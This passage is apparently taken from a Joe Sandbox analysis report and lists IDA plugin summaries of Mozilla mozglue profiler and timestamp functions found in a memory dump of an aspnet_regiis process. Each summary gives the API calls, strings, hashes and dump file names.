                                                                                                                              • Part of subcall function 6CC5AB3F: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC23527,6CCAF6CC,?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5AB7C
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC3485F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC3487E
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3488B
                                                                                                                            • free.MOZGLUE(?), ref: 6CC3493A
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC34956
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC34960
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3499A
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • free.MOZGLUE(?), ref: 6CC349C6
                                                                                                                            • free.MOZGLUE(?), ref: 6CC349E9
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            Strings
                                                                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC34812
                                                                                                                            • MOZ_PROFILER_SHUTDOWN, xrefs: 6CC34A42
                                                                                                                            • [I %d/%d] profiler_shutdown, xrefs: 6CC34A06
                                                                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC34828
                                                                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC347FC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                            • API String ID: 1340022502-4194431170
                                                                                                                            • Opcode ID: 044255cbd55d1681dfbb053ff69fa1ec5135826a517821e794e4decc113e72a9
                                                                                                                            • Instruction ID: 616637a903ebde17f78b04d2ff7a6f5bc9f5f17de5f1c781c240974d4cb9cbda
                                                                                                                            • Opcode Fuzzy Hash: 044255cbd55d1681dfbb053ff69fa1ec5135826a517821e794e4decc113e72a9
                                                                                                                            • Instruction Fuzzy Hash: 3A81D371A001218FDB00DFA9F898B5E3BB5BF42318F141229D91A97F41F732E895CB96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC34730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC344B2,6CCAE21C,6CCAF7F8), ref: 6CC3473E
                                                                                                                              • Part of subcall function 6CC34730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC3474A
                                                                                                                            • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CC344BA
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CC344D2
                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CCAF80C,6CC2F240,?,?), ref: 6CC3451A
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC3455C
                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 6CC34592
                                                                                                                            • InitializeCriticalSection.KERNEL32(6CCAF770), ref: 6CC345A2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000008), ref: 6CC345AA
                                                                                                                            • moz_xmalloc.MOZGLUE(00000018), ref: 6CC345BB
                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CCAF818,6CC2F240,?,?), ref: 6CC34612
                                                                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC34636
                                                                                                                            • LoadLibraryW.KERNEL32(user32.dll), ref: 6CC34644
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC3466D
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC3469F
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346AB
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346B2
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346B9
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC346C0
                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC346CD
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC346F1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CC346FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                            • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                            • API String ID: 1702738223-3894940629
                                                                                                                            • Opcode ID: 58d9fa09bfcafc3257402702b026dbcbe1b3cace9ee937cfd4fa5a20ad2e24bf
                                                                                                                            • Instruction ID: 28b12a59016f0780d77598d716d3f41e073e7c9b175b94985433065f22879fc4
                                                                                                                            • Opcode Fuzzy Hash: 58d9fa09bfcafc3257402702b026dbcbe1b3cace9ee937cfd4fa5a20ad2e24bf
                                                                                                                            • Instruction Fuzzy Hash: F961E5B0A00258AFEB10DFE1EC0DB997BB8EB47348F049558E5489B641F7B18985CFA1
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F70E
                                                                                                                            • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC6F8F9
                                                                                                                              • Part of subcall function 6CC36390: GetCurrentThreadId.KERNEL32 ref: 6CC363D0
                                                                                                                              • Part of subcall function 6CC36390: AcquireSRWLockExclusive.KERNEL32 ref: 6CC363DF
                                                                                                                              • Part of subcall function 6CC36390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC3640E
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F93A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F98A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F990
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F994
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F716
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                              • Part of subcall function 6CC2B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC2B5E0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F739
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F746
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F793
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCA385B,00000002,?,?,?,?,?), ref: 6CC6F829
                                                                                                                            • free.MOZGLUE(?,?,00000000,?), ref: 6CC6F84C
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CC6F866
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6FA0C
                                                                                                                              • Part of subcall function 6CC35E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC35E8C
                                                                                                                              • Part of subcall function 6CC35E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35E9D
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentThreadId.KERNEL32 ref: 6CC35EAB
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentThreadId.KERNEL32 ref: 6CC35EB8
                                                                                                                              • Part of subcall function 6CC35E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35ECF
                                                                                                                              • Part of subcall function 6CC35E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CC35F27
                                                                                                                              • Part of subcall function 6CC35E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CC35F47
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentProcess.KERNEL32 ref: 6CC35F53
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentThread.KERNEL32 ref: 6CC35F5C
                                                                                                                              • Part of subcall function 6CC35E60: GetCurrentProcess.KERNEL32 ref: 6CC35F66
                                                                                                                              • Part of subcall function 6CC35E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC35F7E
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6F9C5
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6F9DA
                                                                                                                            Strings
                                                                                                                            • [D %d/%d] profiler_register_thread(%s), xrefs: 6CC6F71F
                                                                                                                            • " attempted to re-register as ", xrefs: 6CC6F858
                                                                                                                            • Thread , xrefs: 6CC6F789
                                                                                                                            • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CC6F9A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                            • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                            • API String ID: 882766088-1834255612
                                                                                                                            • Opcode ID: 8dffc5bbcb67c3c87b71e9a06f92683c34daaf97936ca16a1e63a439d98a97ef
                                                                                                                            • Instruction ID: 26b82ba905679986c0541af3f5ff93cd13e2361e47d03a0f232e38c6170b1d31
                                                                                                                            • Opcode Fuzzy Hash: 8dffc5bbcb67c3c87b71e9a06f92683c34daaf97936ca16a1e63a439d98a97ef
                                                                                                                            • Instruction Fuzzy Hash: C0811171A046049FDB00DF65C894BAEB7B5FF85308F44856DE84A9BB51FB30D849CBA2
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EE60
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EE6D
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EE92
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC6EEA5
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CC6EEB4
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC6EEBB
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EEC7
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6EECF
                                                                                                                              • Part of subcall function 6CC6DE60: GetCurrentThreadId.KERNEL32 ref: 6CC6DE73
                                                                                                                              • Part of subcall function 6CC6DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC34A68), ref: 6CC6DE7B
                                                                                                                              • Part of subcall function 6CC6DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC34A68), ref: 6CC6DEB8
                                                                                                                              • Part of subcall function 6CC6DE60: free.MOZGLUE(00000000,?,6CC34A68), ref: 6CC6DEFE
                                                                                                                              • Part of subcall function 6CC6DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC6DF38
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EF1E
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EF2B
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EF59
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EFB0
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EFBD
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6EFE1
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EFF8
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F000
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC6F02F
                                                                                                                              • Part of subcall function 6CC6F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC6F09B
                                                                                                                              • Part of subcall function 6CC6F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC6F0AC
                                                                                                                              • Part of subcall function 6CC6F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC6F0BE
                                                                                                                            Strings
                                                                                                                            • [I %d/%d] profiler_pause, xrefs: 6CC6F008
                                                                                                                            • [I %d/%d] profiler_stop, xrefs: 6CC6EED7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                            • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                            • API String ID: 16519850-1833026159
                                                                                                                            • Opcode ID: 7c4b477100c59163abf7d06f269b8fbedbcfb2906d7136136fd02edb0f938473
                                                                                                                            • Instruction ID: 5e1f44ad2b7526503d7914df36b38e588839e37c803a2712ae1ef5c18aa92f0e
                                                                                                                            • Opcode Fuzzy Hash: 7c4b477100c59163abf7d06f269b8fbedbcfb2906d7136136fd02edb0f938473
                                                                                                                            • Instruction Fuzzy Hash: 22511235A042159FDB00ABEAF95C7AD7BB4EB46328F14452AE91583F80FB314805C7E6
                                                                                                                            APIs
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35E9D
                                                                                                                              • Part of subcall function 6CC45B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC456EE,?,00000001), ref: 6CC45B85
                                                                                                                              • Part of subcall function 6CC45B50: EnterCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45B90
                                                                                                                              • Part of subcall function 6CC45B50: LeaveCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45BD8
                                                                                                                              • Part of subcall function 6CC45B50: GetTickCount64.KERNEL32 ref: 6CC45BE4
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC35EAB
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC35EB8
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC35ECF
                                                                                                                            • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CC36017
                                                                                                                              • Part of subcall function 6CC24310: moz_xmalloc.MOZGLUE(00000010,?,6CC242D2), ref: 6CC2436A
                                                                                                                              • Part of subcall function 6CC24310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC242D2), ref: 6CC24387
                                                                                                                            • moz_xmalloc.MOZGLUE(00000004), ref: 6CC35F47
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC35F53
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 6CC35F5C
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC35F66
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC35F7E
                                                                                                                            • moz_xmalloc.MOZGLUE(00000024), ref: 6CC35F27
                                                                                                                              • Part of subcall function 6CC3CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC3CAA2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC35E8C
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC3605D
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC355E1), ref: 6CC360CC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                            • String ID: GeckoMain
                                                                                                                            • API String ID: 3711609982-966795396
                                                                                                                            • Opcode ID: 7406b329d3b6e72263801b12cff9331dff07c57994c783e22bc4e617b524c171
                                                                                                                            • Instruction ID: b76f5e3bd3adc2dc52f1a4c6fc10ff168df8b03b82ded5b0a3109d4763b9a565
                                                                                                                            • Opcode Fuzzy Hash: 7406b329d3b6e72263801b12cff9331dff07c57994c783e22bc4e617b524c171
                                                                                                                            • Instruction Fuzzy Hash: 8B71F4B0A04740CFD710DF69E484A6ABBF0FF49304F54596DE48A87B52E731E858CB92
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC231C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC23217
                                                                                                                              • Part of subcall function 6CC231C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC23236
                                                                                                                              • Part of subcall function 6CC231C0: FreeLibrary.KERNEL32 ref: 6CC2324B
                                                                                                                              • Part of subcall function 6CC231C0: __Init_thread_footer.LIBCMT ref: 6CC23260
                                                                                                                              • Part of subcall function 6CC231C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC2327F
                                                                                                                              • Part of subcall function 6CC231C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC2328E
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC232AB
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC232D1
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC232E5
                                                                                                                              • Part of subcall function 6CC231C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC232F7
                                                                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC39675
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC39697
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC396E8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC39707
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3971F
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39773
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC397B7
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397D0
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397EB
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39824
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                            • API String ID: 3361784254-3880535382
                                                                                                                            • Opcode ID: c9c34d7c7c939a449b6c7512bcede9ea343aec751e4f914020c00c933fa7b8d3
                                                                                                                            • Instruction ID: 6586f48d5910129f2d2737f1e6600904ac977ca2c56e7becd1abceabd6da3057
                                                                                                                            • Opcode Fuzzy Hash: c9c34d7c7c939a449b6c7512bcede9ea343aec751e4f914020c00c933fa7b8d3
                                                                                                                            • Instruction Fuzzy Hash: E961B1716002169FDF008FE9F89CB9E7BB4EB4A314F004519E95AD3B90EB30D854CBA1
                                                                                                                            APIs
                                                                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6CC38007
                                                                                                                            • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6CC3801D
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6CC3802B
